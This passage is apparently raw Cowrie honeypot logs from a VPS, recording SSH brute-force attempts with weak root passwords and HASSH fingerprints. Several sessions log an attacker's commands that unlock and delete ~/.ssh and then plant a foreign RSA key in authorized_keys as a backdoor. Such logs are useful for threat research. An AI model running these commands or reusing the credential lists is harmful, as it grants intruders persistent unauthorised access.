28-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:41:15.025253Z","src_ip":"212.227.235.229","session":"c74f29d4e78c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:15.896122Z","src_ip":"212.227.235.229","session":"65e69d9e4f23"}
{"eventid":"cowrie.login.failed","username":"tester","password":"12345678","message":"login attempt [tester/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T01:41:16.024442Z","src_ip":"212.227.235.229","session":"5b147cb16aeb"}
{"eventid":"cowrie.login.success","username":"root","password":"Kong@2022","message":"login attempt [root/Kong@2022] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:41:16.120124Z","src_ip":"212.227.235.229","session":"c74f29d4e78c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:41:16.709615Z","src_ip":"212.227.235.229","session":"c74f29d4e78c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:41:16.710541Z","src_ip":"212.227.235.229","session":"c74f29d4e78c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:41:16.711874Z","src_ip":"212.227.235.229","session":"c74f29d4e78c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:16.971428Z","src_ip":"212.227.235.229","session":"c74f29d4e78c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:17.266495Z","src_ip":"212.227.235.229","session":"5b147cb16aeb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:41:17.502913Z","src_ip":"212.227.235.229","session":"c74f29d4e78c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:41:17.503736Z","src_ip":"212.227.235.229","session":"c74f29d4e78c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:41:17.764027Z","src_ip":"212.227.235.229","session":"c74f29d4e78c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:17.764942Z","src_ip":"212.227.235.229","session":"c74f29d4e78c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40050,"dst_ip":"1.2.3.4","dst_port":22,"session":"a49f668711f2","protocol":"ssh","message":"New connection: 212.227.235.229:40050 (1.2.3.4:22) [session: a49f668711f2]","sensor":"my-vps","timestamp":"2025-09-09T01:41:18.033453Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:41:18.034601Z","src_ip":"212.227.235.229","session":"a49f668711f2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:41:18.299248Z","src_ip":"212.227.235.229","session":"a49f668711f2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:41:19.397242Z","src_ip":"212.227.235.229","session":"a49f668711f2"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:20.664011Z","src_ip":"212.227.235.229","session":"a49f668711f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41094,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f68d5295e16","protocol":"ssh","message":"New connection: 212.227.235.229:41094 (1.2.3.4:22) [session: 0f68d5295e16]","sensor":"my-vps","timestamp":"2025-09-09T01:41:20.927731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:41:20.928692Z","src_ip":"212.227.235.229","session":"0f68d5295e16"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:41:21.193878Z","src_ip":"212.227.235.229","session":"0f68d5295e16"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:21.467967Z","src_ip":"203.195.82.167","session":"b22a3e252dfe"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:41:22.294961Z","src_ip":"212.227.235.229","session":"0f68d5295e16"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:22.554918Z","src_ip":"212.227.235.229","session":"c74f29d4e78c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:22.561413Z","src_ip":"212.227.235.229","session":"0f68d5295e16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:28.995209Z","src_ip":"212.227.125.160","session":"2a6dbe2d615a"}
{"eventid":"cowrie.session.closed","duration":180.11833238601685,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:29.000151Z","src_ip":"212.227.125.160","session":"2a6dbe2d615a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53160,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8f15c4ec60a","protocol":"ssh","message":"New connection: 212.227.235.229:53160 (1.2.3.4:22) [session: e8f15c4ec60a]","sensor":"my-vps","timestamp":"2025-09-09T01:41:35.360044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:41:35.360930Z","src_ip":"212.227.235.229","session":"e8f15c4ec60a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:41:35.627564Z","src_ip":"212.227.235.229","session":"e8f15c4ec60a"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"!","message":"login attempt [administrator/!] failed","sensor":"my-vps","timestamp":"2025-09-09T01:41:36.737431Z","src_ip":"212.227.235.229","session":"e8f15c4ec60a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:38.007471Z","src_ip":"212.227.235.229","session":"e8f15c4ec60a"}
{"eventid":"cowrie.session.closed","duration":31.452897787094116,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:44.401834Z","src_ip":"212.227.235.229","session":"62281497df5d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43430,"dst_ip":"1.2.3.4","dst_port":22,"session":"169323bd756b","protocol":"ssh","message":"New connection: 212.227.235.229:43430 (1.2.3.4:22) [session: 169323bd756b]","sensor":"my-vps","timestamp":"2025-09-09T01:41:48.588486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:41:48.589803Z","src_ip":"212.227.235.229","session":"169323bd756b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:41:48.830536Z","src_ip":"212.227.235.229","session":"169323bd756b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47896,"dst_ip":"1.2.3.4","dst_port":22,"session":"b66f4f66026a","protocol":"ssh","message":"New connection: 212.227.235.229:47896 (1.2.3.4:22) [session: b66f4f66026a]","sensor":"my-vps","timestamp":"2025-09-09T01:41:49.108616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:41:49.109397Z","src_ip":"212.227.235.229","session":"b66f4f66026a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:41:49.229010Z","src_ip":"212.227.235.229","session":"b66f4f66026a"}
{"eventid":"cowrie.login.failed","username":"miner","password":"miner2025","message":"login attempt [miner/miner2025] failed","sensor":"my-vps","timestamp":"2025-09-09T01:41:49.739849Z","src_ip":"212.227.235.229","session":"b66f4f66026a"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@111","message":"login attempt [root/Admin@111] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:41:49.825875Z","src_ip":"212.227.235.229","session":"169323bd756b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:41:50.347986Z","src_ip":"212.227.235.229","session":"169323bd756b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:41:50.348762Z","src_ip":"212.227.235.229","session":"169323bd756b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:41:50.349607Z","src_ip":"212.227.235.229","session":"169323bd756b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:50.588754Z","src_ip":"212.227.235.229","session":"169323bd756b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:50.858401Z","src_ip":"212.227.235.229","session":"b66f4f66026a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:41:51.123423Z","src_ip":"212.227.235.229","session":"169323bd756b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:41:51.124155Z","src_ip":"212.227.235.229","session":"169323bd756b"}
{"eventid":"cowrie.session.connect","src_ip":"88.247.83.19","src_port":42189,"dst_ip":"1.2.3.4","dst_port":23,"session":"a9cf8668dcdb","protocol":"telnet","message":"New connection: 88.247.83.19:42189 (1.2.3.4:23) [session: a9cf8668dcdb]","sensor":"my-vps","timestamp":"2025-09-09T01:41:51.181343Z"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:41:51.364235Z","src_ip":"212.227.235.229","session":"169323bd756b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:51.365199Z","src_ip":"212.227.235.229","session":"169323bd756b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43434,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a3e93873e74","protocol":"ssh","message":"New connection: 212.227.235.229:43434 (1.2.3.4:22) [session: 9a3e93873e74]","sensor":"my-vps","timestamp":"2025-09-09T01:41:51.590516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:41:51.591691Z","src_ip":"212.227.235.229","session":"9a3e93873e74"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:41:51.822388Z","src_ip":"212.227.235.229","session":"9a3e93873e74"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:41:52.770048Z","src_ip":"212.227.235.229","session":"9a3e93873e74"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:53.999967Z","src_ip":"212.227.235.229","session":"9a3e93873e74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43440,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa2719e90fe4","protocol":"ssh","message":"New connection: 212.227.235.229:43440 (1.2.3.4:22) [session: fa2719e90fe4]","sensor":"my-vps","timestamp":"2025-09-09T01:41:54.223855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:41:54.226245Z","src_ip":"212.227.235.229","session":"fa2719e90fe4"}
